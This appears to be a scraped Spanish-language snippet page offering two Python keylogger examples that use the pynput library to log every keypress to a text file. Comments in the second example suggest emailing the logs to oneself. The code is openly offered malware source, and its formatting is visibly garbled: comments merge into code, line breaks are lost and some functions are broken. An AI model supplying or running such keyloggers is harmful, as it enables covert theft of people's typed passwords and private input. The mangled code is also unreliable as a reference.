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ejemplo de código de código fuente de keylogger python

este problema se puede resolver de diversas maneras, pero en este caso te mostramos la que para nosotros es la respuesta más completa.

Ejemplo 1: registrador de teclas de Python

import logging
import os
from pynput.keyboard import Listener

log_Directory = os.getcwd()+'/'# where save fileprint(os.getcwd())# directory# create file 
logging.basicConfig(filename=(log_Directory +"key_log.txt"), level=logging.DEBUG,format='%(asctime)s: %(message)s')# function in loggingdefon_press(key): when press key save the key in filewith Listener(on_press=on_press)as listener:
    listener.join()# infinite cicle

Ejemplo 2: keylogger en python

#pip install pynput OR python3 -m pip install pynput#ONLY ONE MODULE REQUIREDfrom pynput.keyboard import Listener #add ", Key" here if you want to be able to act when keys like Enter and esc are pressed)#you can use the yagmail python module to email yourself the log with a gmail account when a key is pressed (if key.char == ... OR if key=Key.(esc, enter, shift))file=open("log.txt","a")#save to the current directory. To save to another location use r'C:Usersktmetclog.txt'#NOTE - it does not matter if "log.txt" exists or not. Python will automatically create that file.defon_press(key):try:file.write(f'nkey')file.flush()#save changesexcept:pass#ignore all errors
listener = Listener(on_press=on_press)#you can also use "with listener as Listener(on_press...):"

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